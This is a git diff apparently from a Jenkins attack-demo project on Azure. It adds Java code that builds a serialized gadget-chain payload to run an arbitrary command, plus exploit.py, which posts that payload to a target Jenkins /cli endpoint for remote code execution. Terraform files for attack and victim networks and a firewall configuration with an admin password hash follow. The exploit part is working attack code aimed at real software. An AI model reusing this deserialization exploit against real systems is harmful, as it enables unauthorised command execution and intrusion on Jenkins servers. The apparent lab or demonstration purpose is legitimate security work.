+            f2 = HashMap.class.getDeclaredField("elementData");
+        }
+ 
+        f2.setAccessible(true);
+        Object[] array2 = (Object[]) f2.get(innimpl);
+ 
+        Object node = array2[0];
+        if (node == null) {
+            node = array2[1];
+        }
+ 
+        Field keyField = null;
+        try {
+            keyField = node.getClass().getDeclaredField("key");
+        } catch (Exception e) {
+            keyField = Class.forName("java.util.MapEntry").getDeclaredField(
+                    "key");
+        }
+ 
+        keyField.setAccessible(true);
+        keyField.set(node, entry);
+ 
+        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
+        keyPairGenerator.initialize(1024);
+        KeyPair keyPair = keyPairGenerator.genKeyPair();
+        PrivateKey privateKey = keyPair.getPrivate();
+        PublicKey publicKey = keyPair.getPublic();
+ 
+        Signature signature = Signature.getInstance(privateKey.getAlgorithm());
+        SignedObject payload = new SignedObject(map, privateKey, signature);
+        JSONArray array = new JSONArray();
+ 
+        array.add("asdf");
+ 
+        ListOrderedSet set = new ListOrderedSet();
+        Field f1 = AbstractCollectionDecorator.class
+                .getDeclaredField("collection");
+        f1.setAccessible(true);
+        f1.set(set, array);
+ 
+        DummyComperator comp = new DummyComperator();
+        ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
+        csls.add(payload);
+ 
+        CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
+        CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
+ 
+        a1.add(set);
+        Container c = new Container(csls);
+        a1.add(c);
+ 
+        a2.add(csls);
+        a2.add(set);
+ 
+        ReferenceMap flat3map = new ReferenceMap();
+        flat3map.put(new Container(a1), "asdf");
+        flat3map.put(new Container(a2), "asdf");
+ 
+        return flat3map;
+    }
+ 
+    private Object writeReplace() throws ObjectStreamException {
+        return this.payload;
+    }
+ 
+    static class Container implements Serializable {
+ 
+        private Object o;
+ 
+        public Container(Object o) {
+            this.o = o;
+        }
+ 
+        private Object writeReplace() throws ObjectStreamException {
+            return o;
+        }
+ 
+    }
+ 
+    static class DummyComperator implements Comparator, Serializable {
+ 
+        public int compare(Object arg0, Object arg1) {
+            // TODO Auto-generated method stub
+            return 0;
+        }
+ 
+        private Object writeReplace() throws ObjectStreamException {
+            return null;
+        }
+ 
+    }
+ 
+    public static void main(String args[]) throws Exception{
+ 
+        if(args.length != 2){
+            System.out.println("java -jar payload.jar outfile cmd");
+            System.exit(0);
+        }
+ 
+        String cmd = args[1];
+        FileOutputStream out = new FileOutputStream(args[0]);
+ 
+        Payload pwn = new Payload(cmd);
+        ObjectOutputStream oos = new ObjectOutputStream(out);
+        oos.writeObject(pwn);
+        oos.flush();
+        out.flush();
+ 
+ 
+    }
+ 
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar b/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar
new file mode 100644
index 00000000..218510bc
Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar differ
diff --git a/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar b/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar
new file mode 100644
index 00000000..c35fa1fe
Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar differ
diff --git a/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar b/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar
new file mode 100644
index 00000000..98467d3a
Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar differ
diff --git a/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar b/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar
new file mode 100644
index 00000000..93a3b9f6
Binary files /dev/null and b/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar differ
diff --git a/azure/Jenkins_proj-master/payload/exploit.py b/azure/Jenkins_proj-master/payload/exploit.py
new file mode 100644
index 00000000..89c789d4
--- /dev/null
+++ b/azure/Jenkins_proj-master/payload/exploit.py
@@ -0,0 +1,92 @@
+import urllib
+import requests
+import uuid
+import threading
+import time
+import gzip
+import urllib3
+import zlib
+import subprocess
+ 
+proxies = {
+#  'http': 'http://127.0.0.1:8085',
+#  'https': 'http://127.0.0.1:8090',
+}
+
+TARGET = input("Enter Jenkins Target IP Address: ")
+URL='http://' + TARGET + ':80/cli'
+ 
+PREAMBLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
+PROTO = b'\x00\x00\x00\x00'
+ 
+ 
+FILE_SER = open("payload.ser", "rb").read()
+ 
+def download(url, session):
+ 
+    headers = {'Side' : 'download'}
+    #headers['Content-type'] = 'application/x-www-form-urlencoded'
+    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+    headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+    headers['Session'] = session
+    headers['Transfer-Encoding'] = 'chunked'
+    r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True)
+    print(r.content)
+ 
+ 
+def upload(url, session, data):
+ 
+    headers = {'Side' : 'upload'}
+    headers['Session'] = session
+    #headers['Content-type'] = 'application/octet-stream'
+    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+    #headers['Content-Length'] = '335'
+    headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+    headers['Accept-Encoding'] = None
+    r = requests.post(url,data=data,headers=headers,proxies=proxies)
+ 
+ 
+def upload_chunked(url,session, data):
+ 
+    headers = {'Side' : 'upload'}
+    headers['Session'] = session
+    #headers['Content-type'] = 'application/octet-stream'
+    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+    #headers['Content-Length'] = '335'
+    headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+    headers['Accept-Encoding']= None
+    headers['Transfer-Encoding'] = 'chunked'
+    headers['Cache-Control'] = 'no-cache'
+ 
+    r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies)
+ 
+ 
+def null_payload():
+    yield b" "
+ 
+def create_payload():
+    payload = PREAMBLE + PROTO + FILE_SER
+ 
+    return payload
+ 
+def create_payload_chunked():
+    yield PREAMBLE
+    yield PROTO
+    yield FILE_SER
+ 
+def main():
+    print("start")
+ 
+    session = str(uuid.uuid4())
+ 
+    t = threading.Thread(target=download, args=(URL, session))
+    t.start()
+ 
+    time.sleep(1)
+    print("pwn")
+    #upload(URL, session, create_payload())
+ 
+    upload_chunked(URL, session, "asdf")
+ 
+if __name__ == "__main__":
+    main()
diff --git a/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar b/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar
new file mode 100644
index 00000000..30fad12d
Binary files /dev/null and b/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar differ
diff --git a/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar b/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar
new file mode 100644
index 00000000..a47f128a
Binary files /dev/null and b/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar differ
diff --git a/azure/Jenkins_proj-master/payload/payload.jar b/azure/Jenkins_proj-master/payload/payload.jar
new file mode 100644
index 00000000..51e0bcc9
Binary files /dev/null and b/azure/Jenkins_proj-master/payload/payload.jar differ
diff --git a/azure/Jenkins_proj-master/requirements.txt b/azure/Jenkins_proj-master/requirements.txt
index 98083fd2..f5126452 100644
--- a/azure/Jenkins_proj-master/requirements.txt
+++ b/azure/Jenkins_proj-master/requirements.txt
@@ -1,183 +1,227 @@
-adal
-antlr4-python3-runtime
-applicationinsights
-argcomplete
-asn1crypto
-azure-batch
-azure-cli
-azure-cli-acr
-azure-cli-acs
-azure-cli-advisor
-azure-cli-ams
-azure-cli-appservice
-azure-cli-backup
-azure-cli-batch
-azure-cli-batchai
-azure-cli-billing
-azure-cli-botservice
-azure-cli-cdn
-azure-cli-cloud
-azure-cli-cognitiveservices
-azure-cli-command-modules-nspkg
-azure-cli-configure
-azure-cli-consumption
-azure-cli-container
-azure-cli-core
-azure-cli-cosmosdb
-azure-cli-dla
-azure-cli-dls
-azure-cli-dms
-azure-cli-eventgrid
-azure-cli-eventhubs
-azure-cli-extension
-azure-cli-feedback
-azure-cli-find
-azure-cli-hdinsight
-azure-cli-interactive
-azure-cli-iot
-azure-cli-iotcentral
-azure-cli-keyvault
-azure-cli-kusto
-azure-cli-lab
-azure-cli-maps
-azure-cli-monitor
-azure-cli-network
-azure-cli-nspkg
-azure-cli-policyinsights
-azure-cli-privatedns
-azure-cli-profile
-azure-cli-rdbms
-azure-cli-redis
-azure-cli-relay
-azure-cli-reservations
-azure-cli-resource
-azure-cli-role
-azure-cli-search
-azure-cli-security
-azure-cli-servicebus
-azure-cli-servicefabric
-azure-cli-signalr
-azure-cli-sql
-azure-cli-sqlvm
-azure-cli-storage
-azure-cli-telemetry
-azure-cli-vm
-azure-common
-azure-datalake-store
-azure-functions-devops-build
-azure-graphrbac
-azure-keyvault
-azure-mgmt-advisor
-azure-mgmt-applicationinsights
-azure-mgmt-authorization
-azure-mgmt-batch
-azure-mgmt-batchai
-azure-mgmt-billing
-azure-mgmt-botservice
-azure-mgmt-cdn
-azure-mgmt-cognitiveservices
-azure-mgmt-compute
-azure-mgmt-consumption
-azure-mgmt-containerinstance
-azure-mgmt-containerregistry
-azure-mgmt-containerservice
-azure-mgmt-cosmosdb
-azure-mgmt-datalake-analytics
-azure-mgmt-datalake-nspkg
-azure-mgmt-datalake-store
-azure-mgmt-datamigration
-azure-mgmt-devtestlabs
-azure-mgmt-dns
-azure-mgmt-eventgrid
-azure-mgmt-eventhub
-azure-mgmt-hdinsight
-azure-mgmt-iotcentral
-azure-mgmt-iothub
-azure-mgmt-iothubprovisioningservices
-azure-mgmt-keyvault
-azure-mgmt-kusto
-azure-mgmt-loganalytics
-azure-mgmt-managementgroups
-azure-mgmt-maps
-azure-mgmt-marketplaceordering
-azure-mgmt-media
-azure-mgmt-monitor
-azure-mgmt-msi
-azure-mgmt-network
-azure-mgmt-nspkg
-azure-mgmt-policyinsights
-azure-mgmt-privatedns
-azure-mgmt-rdbms
-azure-mgmt-recoveryservices
-azure-mgmt-recoveryservicesbackup
-azure-mgmt-redis
-azure-mgmt-relay
-azure-mgmt-reservations
-azure-mgmt-resource
-azure-mgmt-search
-azure-mgmt-security
-azure-mgmt-servicebus
-azure-mgmt-servicefabric
-azure-mgmt-signalr
-azure-mgmt-sql
-azure-mgmt-sqlvirtualmachine
-azure-mgmt-storage
-azure-mgmt-trafficmanager
-azure-mgmt-web
-azure-multiapi-storage
-azure-nspkg
-azure-storage
-azure-storage-blob
-azure-storage-common
-azure-storage-nspkg
-bcrypt
-certifi
-cffi
-chardet
-colorama
-cryptography
-fabric
-humanfriendly
-idna
-invoke
-ipaddress
-isodate
-Jinja2
-jmespath
-knack
-MarkupSafe
-mock
-msrest
-msrestazure
-oauthlib
-pan-python
-pandevice
-paramiko
-pbr
-portalocker
-prompt-toolkit
-psutil
-pyasn1
-pycparser
-pydocumentdb
-Pygments
-PyJWT
-PyNaCl
-pyOpenSSL
-pyperclip
-python-dateutil
-python-terraform
-pytz
-PyYAML
-requests
-requests-oauthlib
-scp
-six
-sshtunnel
-tabulate
-urllib3
-vsts
-vsts-cd-manager
-wcwidth
-websocket-client
-xmltodict
\ No newline at end of file
+adal==1.2.1
+amqp==2.4.2
+antlr4-python3-runtime==4.7.2
+applicationinsights==0.11.7
+argcomplete==1.9.5
+asgiref==3.0.0
+asn1crypto==0.24.0
+async-timeout==3.0.1
+atomicwrites==1.3.0
+attrs==19.1.0
+autobahn==19.3.3
+Automat==0.7.0
+azure-batch==6.0.0
+azure-cli==2.0.63
+azure-cli-acr==2.2.5
+azure-cli-acs==2.3.22
+azure-cli-advisor==2.0.0
+azure-cli-ams==0.4.5
+azure-cli-appservice==0.2.18
+azure-cli-backup==1.2.4
+azure-cli-batch==4.0.0
+azure-cli-batchai==0.4.8
+azure-cli-billing==0.2.1
+azure-cli-botservice==0.1.10
+azure-cli-cdn==0.2.3
+azure-cli-cloud==2.1.1
+azure-cli-cognitiveservices==0.2.5
+azure-cli-command-modules-nspkg==2.0.2
+azure-cli-configure==2.0.22
+azure-cli-consumption==0.4.2
+azure-cli-container==0.3.16
+azure-cli-core==2.0.63
+azure-cli-cosmosdb==0.2.10
+azure-cli-deploymentmanager==0.1.0
+azure-cli-dla==0.2.5
+azure-cli-dls==0.1.9
+azure-cli-dms==0.1.3
+azure-cli-eventgrid==0.2.3
+azure-cli-eventhubs==0.3.4
+azure-cli-extension==0.2.5
+azure-cli-feedback==2.2.1
+azure-cli-find==0.3.2
+azure-cli-hdinsight==0.3.3
+azure-cli-interactive==0.4.3
+azure-cli-iot==0.3.8
+azure-cli-iotcentral==0.1.6
+azure-cli-keyvault==2.2.14
+azure-cli-kusto==0.2.2
+azure-cli-lab==0.1.7
+azure-cli-maps==0.3.4
+azure-cli-monitor==0.2.13
+azure-cli-network==2.3.7
+azure-cli-nspkg==3.0.3
+azure-cli-policyinsights==0.1.2
+azure-cli-privatedns==1.0.0
+azure-cli-profile==2.1.5
+azure-cli-rdbms==0.3.10
+azure-cli-redis==0.4.2
+azure-cli-relay==0.1.4
+azure-cli-reservations==0.4.2
+azure-cli-resource==2.1.14
+azure-cli-role==2.6.0
+azure-cli-search==0.1.1
+azure-cli-security==0.1.1
+azure-cli-servicebus==0.3.4
+azure-cli-servicefabric==0.1.17
+azure-cli-signalr==1.0.0
+azure-cli-sql==2.2.2
+azure-cli-sqlvm==0.1.1
+azure-cli-storage==2.4.1
+azure-cli-telemetry==1.0.2
+azure-cli-vm==2.2.19
+azure-common==1.1.20
+azure-datalake-store==0.0.39
+azure-functions-devops-build==0.0.21
+azure-graphrbac==0.60.0
+azure-keyvault==1.1.0
+azure-mgmt-advisor==2.0.1
+azure-mgmt-applicationinsights==0.1.1
+azure-mgmt-authorization==0.50.0
+azure-mgmt-batch==6.0.0
+azure-mgmt-batchai==2.0.0
+azure-mgmt-billing==0.2.0
+azure-mgmt-botservice==0.1.0
+azure-mgmt-cdn==3.1.0
+azure-mgmt-cognitiveservices==3.0.0
+azure-mgmt-compute==4.6.1
+azure-mgmt-consumption==2.0.0
+azure-mgmt-containerinstance==1.4.0
+azure-mgmt-containerregistry==2.7.0
+azure-mgmt-containerservice==4.4.0
+azure-mgmt-cosmosdb==0.5.2
+azure-mgmt-datalake-analytics==0.2.1
+azure-mgmt-datalake-nspkg==3.0.1
+azure-mgmt-datalake-store==0.5.0
+azure-mgmt-datamigration==0.1.0
+azure-mgmt-deploymentmanager==0.1.0
+azure-mgmt-devtestlabs==2.2.0
+azure-mgmt-dns==2.1.0
+azure-mgmt-eventgrid==2.0.0
+azure-mgmt-eventhub==2.3.0
+azure-mgmt-hdinsight==0.2.1
+azure-mgmt-iotcentral==1.0.0
+azure-mgmt-iothub==0.7.0
+azure-mgmt-iothubprovisioningservices==0.2.0
+azure-mgmt-keyvault==1.1.0
+azure-mgmt-kusto==0.3.0
+azure-mgmt-loganalytics==0.2.0
+azure-mgmt-managementgroups==0.1.0
+azure-mgmt-maps==0.1.0
+azure-mgmt-marketplaceordering==0.1.0
+azure-mgmt-media==1.1.1
+azure-mgmt-monitor==0.5.2
+azure-mgmt-msi==0.2.0
+azure-mgmt-network==2.6.0
+azure-mgmt-nspkg==3.0.2
+azure-mgmt-policyinsights==0.2.0
+azure-mgmt-privatedns==0.1.0
+azure-mgmt-rdbms==1.7.1
+azure-mgmt-recoveryservices==0.1.1
+azure-mgmt-recoveryservicesbackup==0.1.2
+azure-mgmt-redis==6.0.0
+azure-mgmt-relay==0.1.0
+azure-mgmt-reservations==0.3.1
+azure-mgmt-resource==2.1.0
+azure-mgmt-search==2.0.0
+azure-mgmt-security==0.1.0
+azure-mgmt-servicebus==0.5.3
+azure-mgmt-servicefabric==0.2.0
+azure-mgmt-signalr==0.1.1
+azure-mgmt-sql==0.12.0
+azure-mgmt-sqlvirtualmachine==0.2.0
+azure-mgmt-storage==3.1.1
+azure-mgmt-trafficmanager==0.51.0
+azure-mgmt-web==0.41.0
+azure-multiapi-storage==0.2.3
+azure-nspkg==3.0.2
+azure-storage==0.36.0
+azure-storage-blob==1.3.1
+azure-storage-common==1.4.0
+azure-storage-file==1.4.0
+azure-storage-nspkg==3.1.0
+bcrypt==3.1.6
+billiard==3.6.0.0
+celery==4.3.0
+certifi==2019.3.9
+cffi==1.12.3
+chardet==3.0.4
+collections2==0.3.0
+colorama==0.4.1
+constantly==15.1.0
+cryptography==2.4.2
+decorator==4.4.0
+Django==2.2.8
+django-widget-tweaks==1.4.3
+docker==3.7.2
+docker-pycreds==0.4.0
+fabric==2.4.0
+gitdb2==2.0.5
+GitPython==2.1.11
+gunicorn==19.9.0
+humanfriendly==4.18
+hyperlink==18.0.0
+idna==2.8
+incremental==17.5.0
+invoke==1.2.0
+ipaddress==1.0.22
+isodate==0.6.0
+Jinja2==2.10.1
+jmespath==0.9.4
+jsonpath-ng==1.4.3
+knack==0.5.4
+kombu==4.5.0
+MarkupSafe==1.1.1
+mock==2.0.0
+more-itertools==7.0.0
+msrest==0.6.6
+msrestazure==0.6.0
+oauthlib==3.0.1
+oyaml==0.9
+pan-python==0.14.0
+pandevice==0.6.6
+paramiko==2.4.2
+passlib==1.7.1
+pbr==5.2.0
+pluggy==0.9.0
+ply==3.11
+portalocker==1.2.1
+prompt-toolkit==1.0.15
+psutil==5.6.6
+py==1.8.0
+pyAesCrypt==0.4.2
+pyasn1==0.4.5
+pycparser==2.19
+pydocumentdb==2.3.3
+Pygments==2.3.1
+PyHamcrest==1.9.0
+PyJWT==1.7.1
+PyNaCl==1.3.0
+pyOpenSSL==19.0.0
+pyperclip==1.7.0
+pytest==4.4.0
+pytest-django==3.4.8
+python-dateutil==2.8.0
+python-terraform==0.10.0
+pytz==2019.1
+PyYAML==5.1
+requests==2.21.0
+requests-oauthlib==1.2.0
+scp==0.13.2
+six==1.12.0
+smmap2==2.0.5
+sqlparse==0.3.0
+sshtunnel==0.1.4
+tabulate==0.8.3
+twisted>=19.7.0
+txaio==18.8.1
+urllib3==1.24.2
+vine==1.3.0
+virtualenv==16.4.3
+virtualenv-clone==0.5.2
+vsts==0.1.25
+vsts-cd-manager==1.0.2
+wcwidth==0.1.7
+websocket-client==0.56.0
+xmltodict==0.12.0
+zope.interface==4.6.0
diff --git a/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf b/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf
new file mode 100644
index 00000000..45ed9eb8
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf
@@ -0,0 +1,2 @@
+variable "RG_Name" {}
+variable "Azure_Region" {}
diff --git a/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf b/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf
new file mode 100644
index 00000000..0c187a78
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf
@@ -0,0 +1,10 @@
+resource "random_id" "storage_account" {
+  byte_length = 2
+}
+resource "azurerm_storage_account" "bootstrap" {
+  name                     = "bootstrap${lower(random_id.storage_account.hex)}"
+  resource_group_name      = "${azurerm_resource_group.resourcegroup.name}"
+  location                 = "${azurerm_resource_group.resourcegroup.location}"
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf b/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf
new file mode 100644
index 00000000..4c5d6346
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf
@@ -0,0 +1,9 @@
+output "Resource_Group" {
+  value = "${azurerm_resource_group.resourcegroup.name}"
+}
+output "Storage_Account_Access_Key" {
+  value = "${azurerm_storage_account.bootstrap.primary_access_key}"
+}
+output "Bootstrap_Bucket" {
+  value="bootstrap${lower(random_id.storage_account.hex)}"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf b/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf
new file mode 100644
index 00000000..7c24c105
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf
@@ -0,0 +1,14 @@
+# Configure the Microsoft Azure Provider
+provider "azurerm" {}
+
+resource "random_id" "resource_group" {
+  byte_length = 2
+}
+
+# ********** RESOURCE GROUP **********
+
+# Create a resource group
+resource "azurerm_resource_group" "resourcegroup" {
+	name		= "${var.RG_Name}-${lower(random_id.resource_group.hex)}"
+	location	= "${var.Azure_Region}"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars b/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars
new file mode 100644
index 00000000..9f03abf8
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars
@@ -0,0 +1,3 @@
+RG_Name = "<Jenkins RG Name>"
+
+Azure_Region = "<Azure Region>"
diff --git a/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf b/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf
new file mode 100644
index 00000000..3d83fa8d
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf
@@ -0,0 +1,25 @@
+variable "RG_Name" {}
+variable "Attack_RG_Name" {}
+variable "Azure_Region" {}
+variable "Admin_Username" {}
+variable "Admin_Password" {}
+variable "Bootstrap_Storage_Account" {}
+variable "Storage_Account_Access_Key" {}
+variable "Storage_Account_Fileshare" {}
+variable "Storage_Account_Fileshare_Directory" {}
+variable "Web_Initscript_Path" {}
+variable "Attack_Initscript_Path" {}
+variable "Victim_CIDR" {}
+variable "Attack_CIDR" {}
+variable "Mgmt_Subnet_CIDR" {}
+variable "Untrust_Subnet_CIDR" {}
+variable "Trust_Subnet_CIDR" {}
+variable "AppGW_Subnet_CIDR" {}
+variable "Web_Subnet_CIDR" {}
+variable "Attack_Subnet_CIDR" {}
+variable "FW_Mgmt_IP" {}
+variable "FW_Untrust_IP" {}
+variable "FW_Trust_IP" {}
+variable "WebLB_IP" {}
+variable "Web_IP" {}
+variable "Attack_IP" {}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf b/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf
new file mode 100644
index 00000000..3fa38e0a
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf
@@ -0,0 +1,18 @@
+resource "random_id" "storage_account" {
+  byte_length = 8
+}
+
+resource "azurerm_storage_account" "jenkins" {
+  name                     = "${lower(random_id.storage_account.hex)}"
+  resource_group_name      = "${azurerm_resource_group.resourcegroup.name}"
+  location                 = "${azurerm_resource_group.resourcegroup.location}"
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+}
+
+resource "azurerm_storage_share" "bootstrap" {
+  name = "bootstrap"
+  resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
+  storage_account_name = "${azurerm_storage_account.jenkins.name}"
+  quota = 1
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml
new file mode 100644
index 00000000..e528f907
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml
@@ -0,0 +1,2620 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$fhfqjgjl$UKU4H9KWTwmKrxropu9BK.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg==</public-key>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <log-settings>
+      <email>
+        <entry name="Sample_Email_Profile">
+          <server>
+            <entry name="Sample_Email_Profile">
+              <display-name>Panorama</display-name>
+              <gateway>1.2.3.4</gateway>
+              <from>test@yourdomain.com</from>
+              <to>test@yourdomain.com</to>
+            </entry>
+          </server>
+        </entry>
+      </email>
+      <syslog>
+        <entry name="Sample_Syslog_Profile">
+          <server>
+            <entry name="Sample_Syslog">
+              <transport>UDP</transport>
+              <port>514</port>
+              <format>BSD</format>
+              <server>1.2.3.4</server>
+              <facility>LOG_USER</facility>
+            </entry>
+          </server>
+        </entry>
+      </syslog>
+      <system>
+        <match-list>
+          <entry name="Email_Critical_System_Logs">
+            <send-email>
+              <member>Sample_Email_Profile</member>
+            </send-email>
+            <filter>(severity eq critical)</filter>
+            <description>Email Critical System Logs</description>
+          </entry>
+          <entry name="System_Log_Forwarding">
+            <filter>All Logs</filter>
+            <send-to-panorama>no</send-to-panorama>
+            <send-syslog>
+              <member>Sample_Syslog_Profile</member>
+            </send-syslog>
+          </entry>
+        </match-list>
+      </system>
+      <config>
+        <match-list>
+          <entry name="Configuration_Log_Forwarding">
+            <filter>All Logs</filter>
+            <send-to-panorama>no</send-to-panorama>
+            <send-syslog>
+              <member>Sample_Syslog_Profile</member>
+            </send-syslog>
+          </entry>
+        </match-list>
+      </config>
+      <userid>
+        <match-list>
+          <entry name="User-ID_Log_Forwarding">
+            <filter>All Logs</filter>
+            <send-to-panorama>no</send-to-panorama>
+            <send-syslog>
+              <member>Sample_Syslog_Profile</member>
+            </send-syslog>
+          </entry>
+        </match-list>
+      </userid>
+      <hipmatch>
+        <match-list>
+          <entry name="HIP_Log_Forwarding">
+            <filter>All Logs</filter>
+            <send-to-panorama>no</send-to-panorama>
+            <send-syslog>
+              <member>Sample_Syslog_Profile</member>
+            </send-syslog>
+          </entry>
+        </match-list>
+      </hipmatch>
+      <profiles>
+        <entry name="default">
+          <match-list>
+            <entry name="Traffic_Log_Forwarding">
+              <log-type>traffic</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Threat_Log_Forwarding">
+              <log-type>threat</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Email_Malicious_Verdicts">
+              <send-email>
+                <member>Sample_Email_Profile</member>
+              </send-email>
+              <action-desc>Email Malicious Wildfire Verdicts</action-desc>
+              <log-type>wildfire</log-type>
+              <filter>(verdict eq malicious)</filter>
+              <send-to-panorama>no</send-to-panorama>
+            </entry>
+            <entry name="Email_Phishing_Verdicts">
+              <send-email>
+                <member>Sample_Email_Profile</member>
+              </send-email>
